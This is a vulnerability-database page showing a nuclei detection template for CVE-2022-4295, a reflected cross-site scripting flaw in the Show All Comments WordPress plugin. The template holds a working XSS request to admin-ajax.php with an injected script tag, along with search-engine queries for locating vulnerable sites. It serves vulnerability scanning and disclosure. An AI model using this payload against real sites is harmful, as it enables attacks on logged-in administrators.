Lucene search
K

Show all comments < 7.0.1 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

The Show All Comments WordPress plugin before 7.0.1 allows Reflected Cross-Site Scripting, posing risk to high privilege users

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the “Show All Comments” plugin of the WordPress content management system allows attackers to perform cross-site scripting attacks.
21 Dec 202300:00
bdu_fstec
Circl
CVE-2022-4295
16 Jan 202318:24
circl
CNNVD
WordPress plugin Show All Comments 跨站脚本漏洞
16 Jan 202300:00
cnnvd
CVE
CVE-2022-4295
16 Jan 202315:38
cve
Cvelist
CVE-2022-4295 Show All Comments < 7.0.1 - Reflected XSS
16 Jan 202315:38
cvelist
NVD
CVE-2022-4295
16 Jan 202316:15
nvd
OSV
CVE-2022-4295
16 Jan 202316:15
osv
Prion
Cross site scripting
16 Jan 202316:15
prion
Positive Technologies
PT-2023-7912 · WordPress · Wordpress Plugin
16 Jan 202300:00
ptsecurity
RedhatCVE
CVE-2022-4295
22 May 202523:54
redhatcve
Rows per page
id: CVE-2022-4295

info:
  name: Show all comments < 7.0.1 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4295
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-4295
    cwe-id: CWE-79
    epss-score: 0.00897
    epss-percentile: 0.55053
    cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: appjetty
    product: show_all_comments
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/show-all-comments-in-one-page
    fofa-query: body=/wp-content/plugins/show-all-comments-in-one-page
    publicwww-query: /wp-content/plugins/show-all-comments-in-one-page
  tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "<script>alert(document.domain)</script>")'
          - 'contains(body, "Select </option>")'
        condition: and
# digest: 4b0a00483046022100dcff53e1dc6c3b22e6cbf88d991f37e3b7c3924b8712e5df657e3857c926826f022100c7b8c7f203a48db2634ee05972090de587339f871518a20cdf0e333ac60de5d4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1
EPSS0.00897
SSVC
23